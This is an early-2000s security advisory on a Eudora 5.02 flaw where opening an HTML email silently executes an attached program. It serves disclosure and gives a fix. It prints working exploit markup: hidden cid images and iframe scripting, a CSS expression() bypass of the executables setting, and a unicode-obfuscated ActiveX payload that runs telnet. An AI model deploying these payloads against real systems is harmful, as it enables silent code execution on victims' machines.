COMMAND

    Eudora

SYSTEMS AFFECTED

    Eudora

PROBLEM

    'http-equiv' found  following.   Silent delivery  and installation
    of an  executable on  a target  computer.   No client  input other
    than opening an email using Eudora 5.02 - Sponsored Mode  provided
    'use Microsoft viewer' and 'allow executables in HTML content' are
    enabled.  One wonders why they are there in the first place.

    This can be achieved with relative ease as follows:
    1. Create yet another HTML mail message as follows:

        <img SRC="cid:mr.malware.to.you" style="display:none">
        <img id=W0W src="cid:malware.com"   style="display:none">
        <center><h6>YOU!DORA</h6></center>
        <IFRAME  id=malware width=10 height=10 style="display:none" ></IFRAME>
        
          <script>
        // 18.03.01 http://www.malware.com
        malware.location.href=W0W.src
        </script>

       Where our  first image  is our  executable.   Our second  image
       comprises a simple JavaScripting and ActiveX control.

       What happens is, once the mail message is opened in Eudora 5.02
       - Sponsored Mode,  the two 'embedded'  images are silently  and
       instantly  transferred  to  the  'Embedded'  folder.   Our very
       simple JavaScript  location.href then  automatically calls  our
       second image  comprising the  simple JavaScripting  and ActiveX
       control [note:   knowing the file  names and locations  are not
       necessary at all], which is then displayed out of sight in  our
       iframe.  This inturn executes our *.exe.

       Very simple.   Because our *.exe  and our simple  JavaScripting
       and ActiveX control  reside in the  same folder [the  so-called
       "Embedded' folder], and because  it is automatically called  to
       our iframe, everything is instant.

       No warning, no nothing.   The *.exe is executed instantly.   No
       client input other than opening the email.

    2. Working  Example.   Harmless  *.exe.  incorporated.  Tested  on
       win98, with  IE5.5 (all  of its  patches and  so-called service
       packs),  Eudora  5.02  -  Sponsored  Mode  with  'use Microsoft
       viewer' and 'allow executables in HTML content' (this refers to
       scripting, not literally executables).

       The following is in plaintext.  We are unable to figure out how
       to import a single message  into Eudora's inbox.  Perhaps  some
       bright spark  knows.   Otherwise, incorporate  the text  sample
       into a  telnet session  or other  and fire  off to  your Eudora
       inbox:

        http://www.malware.com/you!DORA.txt

    The "Allow executables in HTML  content" setting is turned off  by
    default.   The  online  help  and  user  manual  mention  that the
    setting |should remain off for  security reasons.  This of  course
    is  100%  correct.   Unfortunately  on  closer examination we find
    that  this  too  can  be  defeated  quite  easily.   Consider  the
    following non-JavaScript:

        <!doctype html public "-//w3c//dtd html 4.0 transitional//en">
        
        <img SRC="file://C:\WINDOWS\APPLIC~1\QUALCOMM\EUDORA\Embedded\malware.gif"
        height=2 width=2
        STYLE="left:expression(location.href='http://www.malware.com');"></html>
        
        <br>
        <br>
        </body></html>

    This  slips  through,  with  "Allow  executables  in HTML content"
    disabled.  Therefore the results will be the same:

        <img SRC="" height=1 width=1
        STYLE="left:expression(malware.location.href='cid:malware.com');"></

    ...etc

    Further to  all of  this, we  include a  generic more illustrative
    (and  user  friendly  test  working  example).   This  defeats the
    so-called  "Allow  executables  in  HTML  content" being disabled.
    This is specifically  constructed to fire  the ActiveX warning  so
    that it is  visually illustrated (harmless  WSH to fire  telnet if
    you click okay).

    This is by  design and only  for illustrative purposes  (lest some
    idiot complain this demo has a warning and is a lame "exploit").

        <img SRC="cid:malware.com" height=2 width=2
        STYLE="left:expression(document.write('\u0020\u0020\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0020\u0076\u0061\u0072\u0020\u0077\u0073\u0068\u003d\u006e\u0065\u0077\u0020\u0041\u0063\u0074\u0069\u0076\u0065\u0058\u004f\u0062\u006a\u0065\u0063\u0074
        \u0028\u0027\u0057\u0053\u0063\u0072\u0069\u0070\u0074\u002e\u0053\u0068\u0065\u006c\u006c\u0027\u0029\u003b\u0020\u0020\u0077\u0073\u0068\u002e\u0052\u0075\u006e\u0028\u0027\u0074\u0065\u006c\u006e\u0065\u0074\u002e\u0065\u0078\u0065\u0027\u0029\u003b\u0
        03c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0020\u003c\u0021\u002d\u002d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u006d\u0061\u006c\u0077\u0061\u0072\u0065\u002e\u0063\u006f\u006d\u0020\u0032\u0032\u002e\u0030\u0032\u002e
        \u0030\u0031\u0020\u002d\u002d\u003e'))">

SOLUTION

    Disable  'use  Microsoft  viewer'  and  'allow executables in HTML
    content'.

    This inline scripting hole has been  fixed in Eudora 5.1.  A  beta
    of 5.1 can  be found at  http://www.eudora.com/betas/.  The  final
    release of 5.1 will be out very soon.